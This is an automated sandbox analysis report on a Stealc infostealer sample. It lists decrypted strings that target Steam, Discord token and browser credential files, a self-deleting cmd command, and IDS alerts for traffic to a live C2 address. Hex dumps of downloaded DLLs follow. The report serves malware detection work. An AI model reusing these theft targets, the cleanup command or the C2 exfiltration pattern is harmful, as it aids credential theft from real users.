                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: libraryfolders.vdf
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: loginusers.vdf
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Steam\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: browsers
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: done
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: soft
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Discord\tokens.txt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: https
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: POST
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HTTP/1.1
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: hwid
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: build
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: token
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: file_name
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: file
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: message
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: screenshot.jpg
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00419030
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,0_2_0040C920
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C74A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6C74A9A0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C744440 PK11_PrivDecrypt,0_2_6C744440
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C714420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6C714420
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7444C0 PK11_PubEncrypt,0_2_6C7444C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6C7925B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C728670 PK11_ExportEncryptedPrivKeyInfo,0_2_6C728670
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C74A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6C74A650
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C72E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6C72E6E0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6C76A730
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C770180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6C770180
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7443B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6C7443B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C767C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,0_2_6C767C00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C727D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,0_2_6C727D60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C76BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,0_2_6C76BD30
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C769EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,0_2_6C769EC0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C743FF0 PK11_PrivDecryptPKCS1,0_2_6C743FF0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C743850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C743850
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C749840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,0_2_6C749840

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeUnpacked PE file: 0.2.WGo3ga1AL9.exe.400000.0.unpack
                    Source: WGo3ga1AL9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.4:49763 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49765 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.4:49767 version: TLS 1.2
                    Source: Binary string: mozglue.pdbP source: WGo3ga1AL9.exe, 00000000.00000002.2333118552.000000006F8ED000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: nss3.pdb@ source: WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: my_library.pdbU source: WGo3ga1AL9.exe, 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332846243.000000006D011000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: my_library.pdb source: WGo3ga1AL9.exe, WGo3ga1AL9.exe, 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332846243.000000006D011000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: GDBFCGIIIJ.exe, 00000009.00000002.2168579603.00007FF7743C2000.00000040.00000001.01000000.00000011.sdmp, updater.exe, 0000002D.00000002.2181872762.00007FF67DE52000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: GDBFCGIIIJ.exe, 00000009.00000002.2168579603.00007FF7743C2000.00000040.00000001.01000000.00000011.sdmp, updater.exe, 0000002D.00000002.2181872762.00007FF67DE52000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: nss3.pdb source: WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: mozglue.pdb source: WGo3ga1AL9.exe, 00000000.00000002.2333118552.000000006F8ED000.00000002.00000001.01000000.00000010.sdmp
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,LCMapStringW,0_2_0040DF10
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: chrome.exeMemory has grown: Private usage: 8MB later: 41MB

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.235.128.16:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.235.128.16:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49754 -> 185.235.128.16:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://185.235.128.16/562c1eb14955c897.php
                    Source: Malware configuration extractorURLs: http://185.235.128.16/562c1eb14955c897.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 